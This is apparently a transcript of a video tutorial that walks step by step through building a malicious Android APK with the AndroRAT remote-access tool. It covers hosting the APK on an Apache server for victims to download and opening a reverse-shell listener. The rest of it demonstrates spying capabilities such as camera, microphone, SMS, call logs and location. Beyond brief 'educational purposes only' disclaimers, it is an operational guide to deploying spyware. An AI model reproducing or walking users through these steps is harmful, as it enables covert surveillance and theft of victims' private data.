Today we're going to be doing some script kidding. We're going to be going away from all the hard thinking stuff, all the theoretical stuff, and we're going to use a fun tool called AndroRAT, and it's made by Karma9874. I have no clue who he is, but it's a wonderful tool. It's a tool called AndroRAT, which is designed to give you remote control of Android systems. So you basically create a malicious APK file, you take that, send it to the victim, and once the victim downloads it and runs it, you can get stuff like take a picture, take a screenshot, start an audio recording, get SIM card info, basically everything. So first we go here and we copy the git link. We go to our terminal and we do git clone, right click paste to git clone into the repository. Then we go into the AndroRAT folder, ls. Then here we can see we have a AndroRAT.py. We're going to be using this to create a malicious APK file to also set up the listener for the reverse shell. And as you can see here, we also have a requirements.txt. We have requirements to install. In my machine, we have to create an environment first. And for anyone who doesn't know how we do that, we type Python 3-m followed by v for virtual and environment and env for environment, and then we name our virtual environment. I'm going to name it my environment. Then to activate it, we just do source followed by my env dash bin then dash activate. By this right here, we know we activated the environment successfully. I just clear this up. Now we do pip 3 install -r requirements.txt. Now let's just clean it up one more time so it's nice and clean. ls. Now we do Python 3 followed by AndroRAT.py followed by --build, which means to build the APK file, followed by -i, which means IP. Let's just check out our IP real quick. Just make this big. IPA. Right here we have our IP. We copy. Then we paste here. Then we do -p, which means port. So the reverse shell knows where to go. Port 444. Then at the end we just do -o output and we name it whoamitang.apk. Send. Here you can see it successfully built the APK file, whoamitang.apk, and it successfully signed it. Now we need to send the APK file to the Apache server. We do cp for copy. Then file name whoamitang.apk to var www html permissions denied. Okay, we just do sudo in front, sudo, I give my password, and here now it's copied to the Apache server. Now we need to start the Apache server, which we do sudo system restart Apache 2. Let's just restart it. Now let's check the status if it's up. We just type that again and we just replace the status, the restart for status. It's active and running. Now we need to start the reverse shell, the listener. We do same thing in AndroRAT Python 3, AndroRAT.py followed by --shell for reverse shell, followed by IP again. And we just do 000 followed by port, because to tell it where to go, to tell it where to listen, port 444. Here it's waiting for connection now, and I have this Android emulator here so we can try out our attack. First we need to check out our IP again. Yep, here. Now we do 168.178.65 followed by the APK file name whoamitang.apk. We just hit enter. Here, Chrome needs storage access to another file. Yeah, let's give it access. Now allow Chrome to access photo media. Yeah, which because it's setting up and it's in a new phone, we need to give permissions. Downloading. Here it downloaded. We just need to open it. Press open. Now all we do is install the APK file again to finish it off. More details, install anyway. And all we have to do is click open. Once we click open, the reverse shell gets sent and we get the reverse shell. But just remember this for educational purposes only and should never be done to harm anyone. 1, 2, 3. Here it seems like nothing happened. When we go back to our reverse shell, here, we got the reverse shell. Let's type help. Here we can see we can take pic, start a video, start audio, get SMS, get call logs. We can even vibrate the phone, guys. We can literally vibrate the phone while they have it in their hand. We can get location, get IP, SIM details, anything. But just again, remember, never do it to harm anyone. Just for educational purposes only, to have fun, to learn some Linux commands, but never to harm anyone. Thank you.